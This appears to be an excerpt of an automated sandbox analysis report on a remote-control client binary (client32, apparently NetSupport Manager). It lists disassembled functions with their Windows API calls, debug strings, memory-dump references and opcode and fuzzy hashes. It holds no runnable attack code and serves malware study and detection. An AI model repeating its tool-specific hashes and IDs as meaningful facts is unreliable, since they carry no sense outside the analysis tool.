                                                                              • API String ID: 273891520-33395967
                                                                              • Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                              • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                              • Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                              • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                              Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                              • API String ID: 2111968516-2092292787
                                                                              • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                              • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                              • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                              • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                              Function 11069590 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 110695BD
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
                                                                              • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
                                                                              • GetTickCount.KERNEL32 ref: 11069621
                                                                              • wsprintfA.USER32 ref: 11069651
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
                                                                              Strings
                                                                              • idata->n_connections=%d, xrefs: 1106964B
                                                                              • CloseTransports slept for %u ms, xrefs: 11069630
                                                                              • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                              • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                              • API String ID: 2285713701-3017572385
                                                                              • Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                              • Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
                                                                              • Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                              • Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
                                                                              Function 1100D690 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
                                                                              • _strrchr.LIBCMT ref: 1100D6EF
                                                                              • GetCurrentProcessId.KERNEL32 ref: 1100D6FF
                                                                              • wsprintfA.USER32 ref: 1100D720
                                                                              • _memset.LIBCMT ref: 1100D731
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
                                                                              • CloseHandle.KERNEL32(?,00000000), ref: 1100D781
                                                                              • CloseHandle.KERNEL32(?), ref: 1100D78A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                              • String ID: %sNSSilence.exe %u %u$D
                                                                              • API String ID: 1760462761-4146734959
                                                                              • Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                              • Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
                                                                              • Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                              • Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
                                                                              Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                              • GetStockObject.GDI32(00000007), ref: 11003089
                                                                              • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                              • SelectObject.GDI32(?,?), ref: 110030A7
                                                                              • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                              • GetSysColor.USER32(00000004), ref: 110030EB
                                                                              • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                              • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                              • SelectObject.GDI32(?,?), ref: 1100311E
                                                                              • SelectObject.GDI32(?,?), ref: 11003128
                                                                              • DeleteObject.GDI32(?), ref: 1100312E
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                              • String ID:
                                                                              • API String ID: 4121194973-0
                                                                              • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                              • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                              • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                              • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                              Function 1113F710 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 1113F7AB
                                                                              • __CxxThrowException@8.LIBCMT ref: 1113F7C0
                                                                              • SetPropA.USER32(?,?,00000000), ref: 1113F84E
                                                                              • GetPropA.USER32(?), ref: 1113F85D
                                                                              • wsprintfA.USER32 ref: 1113F88F
                                                                              • RemovePropA.USER32(?), ref: 1113F8C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
                                                                              • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                              • API String ID: 2013984029-1590351400
                                                                              • Opcode ID: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                              • Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
                                                                              • Opcode Fuzzy Hash: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                              • Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1
                                                                              Function 110099B0 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 252COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strtok$_malloc
                                                                              • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                              • API String ID: 665538724-3655815180
                                                                              • Opcode ID: 5baa2e015625421891f710dbb52793db04689a75e937aa0c351c47d49298ce5c
                                                                              • Instruction ID: adf310d86d08ca25db8df7bbab2a8961bf55d7c961d25e6615f2bb86ec9d3f5a
                                                                              • Opcode Fuzzy Hash: 5baa2e015625421891f710dbb52793db04689a75e937aa0c351c47d49298ce5c
                                                                              • Instruction Fuzzy Hash: 17A14874E012299FDB61CF24C990BEAF7F4AF49344F1484E9D98DA7241E770AA84CF91
                                                                              Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CountClipboardFormats.USER32 ref: 11033091
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                              • GetLastError.KERNEL32 ref: 110331BF
                                                                              • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                              • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                              • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                              • API String ID: 3210887762-597690070
                                                                              • Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                              • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                              • Opcode Fuzzy Hash: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                              • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                              Function 11053590 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 162COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(111EE294,EE49F673,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                              • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 11053635
                                                                              • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                              • GetTickCount.KERNEL32 ref: 11053660
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                              • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                              • API String ID: 2238969640-1197860701
                                                                              • Opcode ID: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                              • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                              • Opcode Fuzzy Hash: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                              • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                              Function 110654E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 80COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,76EDC3F0,00000000), ref: 11065525
                                                                                • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
                                                                                • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
                                                                              • GetDC.USER32(00000000), ref: 11065558
                                                                              • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110655B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CapsDevice_strtok$Release__wcstoi64
                                                                              • String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                              • API String ID: 3945178471-2526036698
                                                                              • Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                              • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                              • Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                              • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                              Function 1101F2A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 70windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                              • _memset.LIBCMT ref: 1101F2D8
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                              • _free.LIBCMT ref: 1101F305
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
